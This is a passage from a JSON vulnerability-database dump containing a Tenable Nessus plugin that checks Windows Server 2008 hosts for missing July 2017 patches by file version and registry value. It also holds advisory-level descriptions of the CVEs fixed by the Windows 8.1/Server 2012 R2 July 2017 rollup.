script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59926d5e\");\n # https://support.microsoft.com/en-us/help/4025397/windows-performance-monitor-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9381ee94\");\n # https://support.microsoft.com/en-us/help/4025398/security-update-for-msinfo-exe-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2683f326\");\n # https://support.microsoft.com/en-us/help/4025409/security-update-for-the-windows-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?423780d0\");\n # https://support.microsoft.com/en-us/help/4025497/windows-explorer-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?626af1da\");\n # https://support.microsoft.com/en-us/help/4025674/windows-explorer-denial-of-service-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf02f1f7\");\n # https://support.microsoft.com/en-us/help/4025872/windows-powershell-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f364ec16\");\n # https://support.microsoft.com/en-us/help/4025877/security-update-for-windows-server-2008-july-11-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?548d2827\");\n # https://support.microsoft.com/en-us/help/4026059/windows-clfs-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?628791cd\");\n # https://support.microsoft.com/en-us/help/4026061/security-update-for-the-wordpad-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff6e3fd2\");\n # 
https://support.microsoft.com/en-us/help/4032955/windows-search-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54a9e296\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - 4022746\n - 4022748\n - 4022914\n - 4025240\n - 4025252\n - 4025397\n - 4025398\n - 4025409\n - 4025497\n - 4025674\n - 4025872\n - 4025877\n - 4026059\n - 4026061\n - 4032955\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (!defined_func(\"nasl_level\") || nasl_level() < 6000 ) exit(0);\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\n\nkbs = make_list(\n \"4022746\",\n \"4022748\",\n \"4022914\",\n \"4025240\",\n \"4025252\",\n \"4025397\",\n \"4025398\",\n \"4025409\",\n \"4025497\",\n \"4025674\",\n \"4025872\",\n \"4025877\",\n \"4026059\",\n \"4026061\",\n \"4032955\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows Server 2008 SP2. The SP range check is keyed as vista:'2', so Vista is excluded separately by product name below.\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_fversion_init() == HCF_CONNECT) exit(0, \"Unable to create SMB session.\");\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = 
make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4025872\narch = get_kb_item('SMB/ARCH');\n\nswitch (arch)\n{\n case \"x86\":\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"x86_microsoft-windows-powershell-exe_31bf3856ad364e35_7.1.6002.16398_none_2442a61e294c7c71\", file_pat:\"^powershell\\.exe$\", max_recurse:1);\n break;\n case \"x64\":\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_7.1.6002.16398_none_806141a1e1a9eda7\", file_pat:\"^powershell\\.exe$\", max_recurse:1);\n break;\n default:\n files = \"\";\n}\nif (!empty_or_null(files))\n{\n # Checking before registry key check for session handling.\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"msil_system.management.automation_31bf3856ad364e35\", file_pat:\"^System\\.Management\\.Automation\\.dll$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.2.9200.22198'),\n max_versions:make_list('6.2.9200.99999'),\n bulletin:bulletin,\n kb:\"4025872\", session:the_session);\n}\n\n# CVE-2017-8563 applies to Server 2008. On a domain controller the\n# update alone is not enough: the LdapEnforceChannelBinding registry\n# value is also required, so it is checked below and a missing or\n# other value is reported regardless of the file version checks.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln++;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or 
\"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n# 4022746\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"kerberos.dll\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022746\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"kerberos.dll\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022746\")\n )\n vuln++;\n\n# 4022748\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netio.sys\", version:\"6.0.6002.19805\", min_version:\"6.0.6000.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022748\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netio.sys\", version:\"6.0.6002.24125\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022748\")\n)\n vuln++;\n\n# 4022914\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"http.sys\", version:\"6.0.6002.19812\", min_version:\"6.0.6002.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022914\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"http.sys\", version:\"6.0.6002.24132\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022914\")\n )\n vuln++;\n\n# 4025240\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msxml3.dll\", version:\"8.100.5015.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025240\"))\n vuln++;\n\n# 4025397\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"perfmon.exe\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025397\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"perfmon.exe\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025397\")\n )\n vuln++;\n\n# 4025398\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msinfo32.exe\", 
version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025398\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msinfo32.exe\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025398\")\n )\n vuln++;\n\n# 4025409\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wldap32.dll\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025409\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wldap32.dll\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025409\")\n )\n vuln++;\n\n# 4025497\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"browseui.dll\", version:\"6.0.6002.19806\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025497\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"browseui.dll\", version:\"6.0.6002.24126\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025497\")\n )\n vuln++;\n\n# 4025674\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntfs.sys\", version:\"6.0.6002.19816\", min_version:\"6.0.6002.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4025674\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntfs.sys\", version:\"6.0.6002.24136\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4025674\")\n )\n vuln++;\n\n# 4025877\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19816\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025877\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24136\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025877\")\n )\n vuln++;\n\n# 4026059\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"clfs.sys\", version:\"6.0.6002.19810\", 
min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4026059\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"clfs.sys\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4026059\")\n )\n vuln++;\n\n# 4032955\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"query.dll\", version:\"6.0.6002.19829\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4032955\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"query.dll\", version:\"6.0.6002.24149\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4032955\")\n )\n vuln++;\n\n# 4025252\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21029\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16918\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\")\n)\n vuln++;\n\n# 4026061\nprogram_files = hotfix_get_programfilesdir();\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wordpad.exe\", version:\"6.0.6002.19812\", min_version:\"6.0.6002.16000\", dir:\"\\windows nt\\accessories\", path:program_files, bulletin:bulletin, kb:\"4026061\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wordpad.exe\", version:\"6.0.6002.24133\", min_version:\"6.0.6002.20000\", dir:\"\\windows nt\\accessories\", path:program_files, bulletin:bulletin, kb:\"4026061\")\n )\n vuln++;\n\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:04", "description": "The remote Windows host is missing security update 4025333\nor cumulative update 
4025336. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. 
An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics Component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8594)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_4025336.NASL", "href": "https://www.tenable.com/plugins/nessus/101365", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101365);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8594\",\n \"CVE-2017-8602\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99390,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99401,\n 99402,\n 99408,\n 99409,\n 99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 
99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025333\");\n script_xref(name:\"MSFT\", value:\"MS17-4025333\");\n script_xref(name:\"MSKB\", value:\"4025336\");\n script_xref(name:\"MSFT\", value:\"MS17-4025336\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025333\nor cumulative update 4025336. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. 
A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. 
An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics Component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. 
